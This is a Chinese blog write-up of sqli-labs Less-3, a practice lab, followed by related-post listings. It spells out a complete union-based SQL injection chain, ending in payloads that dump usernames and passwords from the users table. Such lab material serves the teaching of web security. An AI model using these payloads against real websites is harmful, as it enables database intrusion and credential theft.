sqli-labs---第三关

已于 2024-05-25 15:08:51 修改
阅读量534 收藏 10
点赞数 13
分类专栏: CTF解题集 文章标签: sql 数据库
于 2024-05-22 00:19:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/139105189
版权

1、判断什么类型注入

?id=1 正常显示

?id=1' (报错:''1'') LIMIT 0,1')

?id=1'' 正常显示

?id=1'#(报错:''1'') LIMIT 0,1')

可知闭合方式为')

2、查看列数

?id=1') order by 3 --+ (没有报错)

?id=1') order by 4 --+ (报错)

说明有3列

 3、使用联合查询查看回显位置(前面为错可以执行后面的)

?id=-1') union select 1,2,3 --+

回显在2,3,列

4、查询数据库名(security)

?id=-1') union select 1,database(),3 --+

5、查询表名(一共爆出四张表,查看敏感表users)

?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();--+

6、查询users表中字段名(查看到了敏感字段id,username,password)

 ?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users';--+

7、查看字段username和password的信息

  ?id=-1') union select 1,database(),group_concat(username,password) from security.users;--+

为了方便分清楚username和密码,可以用id将信息隔开

   ?id=-1') union select 1,database(),group_concat(username,id,password) from security.users;--+

不拿flag不改名
关注
  • 13
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2183
sqli第三关简要步骤
Sqli-libs通关详解__第三关
henghengzhao_的博客
10-06 611
sqli-libs通关详解,一看就会,超详细
sqli-labs第三关
TA不懒,但还没有添加简介
09-07 756
文章目录总结 第三关找到注入点的时候发现会发现在"1"处右边多了个右括号 构造一下sql语句 select 1,2,3 from table where id=('$id') 所以需要在1’后面增加一个")" 然后使用order by 或者select 判断字段个数 然后和第一关第二关一样 第一二关详细 总结 和前两关不同的是注入点有所改变,需要思考并构造语句。 ...
sqli-labs练习(第三、四关)
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1265
第三关 由前面两关的经验,可以看出它是字符型 然后"闭合,所以输入',但是报错说少了个). 那就加上 后面的步骤同第一关 第四关 第4关,同第3关,只不过闭合符是'单引号,所以换成",后面同第三关 ...
sql-lbas闯关-第三关
weixin_41705627的博客
03-08 340
第三关 第一步 判断注入类型: 1. 根据第三关的提示可以看出,这关的注入类型是:**单引号和单括号** 型注入 第二步 判断有几个字段位可显示数据 输入: http://localhost/sqli/Less-3/?id=1') order by 3 --+ 依次从1开始替换 ‘3’ 的数值,发现输入4的时候报错,而3正确,说明最大有3位字段可显示数据,正确结果如下图所示: 第三步 判...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1572
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-libs闯关
weixin_43411799的博客
09-07 751
sqli-labs闯关less-1 文章目录sqli-labs闯关less-1sqli-libs简介 sqli-libs简介 sqli-lib是一个印度程序员写的,是用来学习SQL注入的闯关游戏,在本地搭建apache+mysql+php环境即可 ##系统函数 version() mysqls数据库版本 user() 数据库用户名 database()数据库名 @@datadir()数据库路径 @@version__compile_os操作系统版本 ##less-1 ####找注入点 我们可以在 ht
mysql-线上常用运维sql-2
jll126的博客
06-11 353
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
LLM之RAG实战(四十)| 使用LangChain SQL Agent和MySQL搭建多层RAG ChatBot
最新发布
wshzd的博客
06-14 562
在第二层,SQL Agent首先获取到用户的问题,然后要求 LLM 根据用户的问题创建 SQL 查询,使用内置函数在MySQL数据库上运行查询。在这里,我们使用的是 ChatPromptTemplate,如果你真的研究它,你会看到它是如何专门编写的,用于创建和运行 SQL 查询。在下一段代码中,将使用上一个代码块中定义的变量创建 QA 链,将消息添加到聊天记录中,然后运行链以获取改进的查询。这是代码的最后一部分,它将首先运行第一层以获取改进的查询,然后我们使用该改进的查询来获得最终响应。
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 857
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
取证工作: SysTools SQL Log Analyzer, 完整的 SQL Server 日志取证分析
sanyuan7783的博客
06-14 831
在深入研究 SQL 事务日志取证之前,让我们先看看 T-log 文件的真实情况。就像许多其他 RDBMS 一样,MS SQL Server 也遵循“预写日志记录”方法。这意味着所有事务在提交之前都写入日志文件,并保存对数据库所做的所有更改的记录。在 SQL 取证工作之前,用户需要知道,从逻辑上讲,事务日志被分类为几个较小的部分,称为 VLF 或虚拟日志文件。每个 SQL 数据库都使用多个 VLF,每个 VLF 的最小大小必须为 512 KB。日志中虚拟文件的大小和数量会随着日志大小的变化而变化。
PostgreSQL的视图pg_roles
lee_vincent1的博客
06-10 632
pg_roles是 PostgreSQL 中的一个系统视图,提供了关于数据库角色(用户和组)的信息。PostgreSQL 中的角色用于管理数据库的权限、登录能力以及其他安全相关的特性。通过查询pg_roles视图,数据库管理员可以了解和管理数据库中所有角色的详细信息。pg_roles。
JavaSpringboot+vur前后端分离党员信息管理系统(源码+sql+论文)
u014445459的博客
06-11 765
简化系统开发和维护。它做的事情越多,就封装了常见的JavaScript功能和代码,并提供了一个简单的JavaScript设计相关的模式,用于优化HTML文档操作、事件处理、CSS样式化、动画设计和Ajax请求交互。在互联网技术高速发展的今天,通过互联网的传播会让企业更容易的创造更多的经济效益,利用互联网的传播党建信息管理、通过网页版党建信息管理平台的实现 ,让更多人了解到党建新闻、组织风采等相关信息、得到了更大的宣传,在这样一个大环境下把资源统筹规化起来,就会获得高效的党建党员信息和推广。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值